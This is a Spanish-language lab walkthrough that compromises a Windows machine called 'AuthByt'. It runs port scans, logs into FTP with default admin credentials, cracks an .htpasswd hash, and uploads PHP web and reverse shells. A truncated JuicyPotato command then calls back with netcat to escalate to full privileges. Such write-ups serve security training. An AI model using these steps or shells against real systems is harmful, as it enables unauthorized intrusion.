MAQUINA AUTHBYT (FTP anonymous y credenciales por defecto + subida de archvio PHP revershell a FTP
Last updated
Last updated
Escaneo de puertos
nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn 192.168.156.45 -oG basicscan.txt
Puertos abiertos 21;242;3145;3389 >> Realizo un escaneo de servicios y versiones.
nmap -p21,242,3145,3389 -sCV 192.168.156.45 -oN fullscan.txt
Reconocimiento de FTP ya que tengo acceso como anonymous pero al ver las carpetas solo esta autorizado por el usuario root a realizar cambios.
ftp 192.168.156.45 >> acceso anonymous pero denegado la descarga de archivos
Examino la web que esta corriendo en el puerto 242 (apache). Una vez dentro me solicita unas credenciales que no tengo.
El puerto 3145 corre un servicio llamado "zftpserver".
Como le da soporte al FTP y tengo este servicio abierto, busque si existen credenciales para acceder al servicio FTP.
Google me identifico 4 variasntes de posibles credenciales, por lo que paso a probarlas en el servicio FTP.
ftp 192.168.156.46
User: admin>> OK
password: admin >> OK
Al primer intento tengo acceso al FTP como admin!, este contiene otros archivos que me los descargo en mi maquina atacante.
get .htaccess (lo mismo con los de mas)
Leo el contenido y observo unas credenciales. Al tener esto modifico el archivo transformándolo en un archivo.txt (de texto) para poder crear el hash con john the ripper.
1: mv .htpasswd cred.txt
2: john --wordlist=/usr/share/wordlists/rockyou.txt cred.txt 3: hash decifrado
Ya tengo la contraseña en texto plano= offsec:elite. Al ver el index.php observe que es dice lo mismo que el informe de nmap.
Así que por ende estas serian credenciales del sitio web, así que las coloco y estoy dentro del mismo.
Como se que el ftp aloja archivos en el servidor web (INDEX.PHP) voy a subir un archivo en PHP.
Ya creado y subido el archivo.php voy a la URL y le agrego el nombre de mi archivo > ? > cmd=whoami.. Esto me devuelve en la web quienes somos o quien ejecuta el sitio.
Como puedo ejecutar comandos y subir archivos, lo que realice es la subida de un revershell.
https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/README.md
Descargo el script y luego veo su código para realizar unas modificaciones.
Modificar la IP: 192.168.45.233
ARCHIVO SHELL.PHP:
Una vez realizado estos cambio, en una terminal me pongo a la escucha con netcat, y luego ejecuto en la web la shell.
Ya recibí la shell, ahora a realizar un reconocimiento:
Veo que tengo privilegios de SeImpersonatePrivilege por ende puedo algunas funciones para realizar la escala de privilegios.
Como es de arquitectura x86 busco el juicypotatox86, una vez descargado esto, descargo varios exploit de Windows.
MAS INFO:
https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterp
Para realizar con éxito la escala de privilegios lo que hago es abusar de los CLSID "{9B1F122C- 2982-4e91-AA8B-E071D54F2A4D}"
Subo a la maquina los archivos EL JUICTPOTATO X 86 Y EL NETCAT X86 o 32.
juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.ex
Antes de ejecutar el script me pongo en escucha con netcat a traves del puerto seleccionado y ejecuto el script.
Ahora tengo todos los privilegios de la maquina.
Modificar la ruta en donde estamos: en este caso C: